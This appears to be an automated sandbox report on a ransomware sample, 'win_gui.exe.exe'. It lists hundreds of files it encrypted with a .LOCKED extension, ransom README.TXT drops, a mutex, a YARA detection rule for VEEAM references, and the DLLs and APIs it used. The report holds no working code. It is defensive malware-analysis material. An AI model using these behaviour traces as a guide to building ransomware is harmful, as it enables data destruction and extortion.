Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIDlg.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99462540804Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\UIAWrappers.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99857739081Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIGdiInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99358329738Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIGdiDC.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99074144487Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIIcons.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99270889863Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIFiles.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99794459845Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99099778931Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPILocale.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99074604893Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIGdi.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99895338604Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIMem.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99020650329Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIReg.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9949211272Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIRes.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99555110701Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIShellEx.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99622405248Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIProc.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99764388598Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPIShPath.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99567981423Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPISysInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99313686346Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPISys.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99775610723Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPITheme.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99557374793Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinAPISysWin.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99711305012Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WindowsConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99434217727Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\word.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9952342039Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Include\WinNet.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99575948442Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX.psd1.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99422765749Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99596249206Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99610253036Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\SciTE\au3.keywords.properties.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99795140846Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX.chm.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99902154825Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.PowerShell.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99614236576Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64_DLL.lib.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99372272189Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.lib.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99452665139Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\kms_host.vbs.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99647172437Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\api-ms-win-crt-private-l1-1-0.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99708036048Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\bci.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99180664129Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dt_shmem.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99386074145Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dt_socket.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99346543352Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\decora_sse.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99729730135Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dcpr.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99900005438Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\eula.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99871234052Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\fontmanager.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99929248295Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\fxplugins.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99880228439Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\j2pcsc.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99221480825Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\j2gss.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99565348821Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\hprof.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99869626992Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\instrument.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99900760664Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\jaas_nt.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9924626937Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\glass.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99912284447Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\j2pkcs11.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99688769708Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\WindowsAccessBridge-32.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99877932026Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\zip.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99739131676Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\wsdetect.dll.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99912356094Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\classlist.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9976421456Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfxswt.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9945329385Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jce.jar.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99874378449Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\tzdb.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99835031009Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Office 2013 - 2022 Theme.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99945897134Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Office Theme.thmx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99945997682Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99732644656Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.accessmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99702663106Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99519123261Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.lyncmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99314755573Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99884632869Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99803539621Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.office64ww.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99927748311Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.9985960587Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99805758117Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\office64mui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99369054916Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\onenotemui.msi.16.en-us.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99399556194Jump to dropped file
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\onenote.x-none.msi.16.x-none.vreg.dat.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy) entropy: 7.99936782695Jump to dropped file

System Summary

Source: 0.2.win_gui.exe.exe.5c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing many references to VEEAM. Observed in ransomware | Author: unknown
Source: C:\Users\user\Desktop\win_gui.exe.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00659FC00_2_00659FC0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00613FB00_2_00613FB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0061FFB00_2_0061FFB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00621F900_2_00621F90
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D6930 appears 81 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DB8A0 appears 431 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D2780 appears 43 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 00680280 appears 605 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D4170 appears 32 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DB870 appears 133 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005E96C0 appears 59 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D30E0 appears 37 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DBAE0 appears 76 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DFF20 appears 125 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DB970 appears 45 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005F5A30 appears 47 times
Source: win_gui.exe.exe, 00000000.00000003.2843536358.00000000081FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe, 00000000.00000003.2837498402.00000000081EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe, 00000000.00000003.2942515228.00000000081FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe, 00000000.00000002.4487208352.00000000081FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 0.2.win_gui.exe.exe.5c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
Source: classification engine | Classification label: mal92.rans.spre.expl.evad.winEXE@1/1341@1/100
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005C6C41 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, CloseHandle
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005CA48C CreateToolhelp32Snapshot, Module32FirstW, CloseHandle, StrStrIW
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005CBB5F CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoCreateInstance, GetNativeSystemInfo, CoCreateInstance, VariantInit, VariantClear, CoSetProxyBlanket, CoUninitialize, VariantInit, VariantClear
Source: C:\Users\user\Desktop\win_gui.exe.exe | File created: C:\Program Files\README.TXT
Source: C:\Users\user\Desktop\win_gui.exe.exe | File created: C:\Users\README.TXT
Source: C:\Users\user\Desktop\win_gui.exe.exe | Mutant created: \Sessions\1\BaseNamedObjects\BEWAREBEAST666
Source: C:\Users\user\Desktop\win_gui.exe.exe | File created: C:\Users\user\AppData\Local\Temp\default.tmp
Source: C:\Users\user\Desktop\win_gui.exe.exe | Command line argument: README.TXT | 0_2_005C55DF
Source: C:\Users\user\Desktop\win_gui.exe.exe | Command line argument: 992547 | 0_2_005C55DF
Source: win_gui.exe.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\win_gui.exe.exe | File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
Source: C:\Users\user\Desktop\win_gui.exe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: win_gui.exe.exe | String found in binary or memory: id-cmc-addExtensions
Source: win_gui.exe.exe | String found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\win_gui.exe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32
Source: C:\Users\user\Desktop\win_gui.exe.exe | File written: C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXTJump to behavior
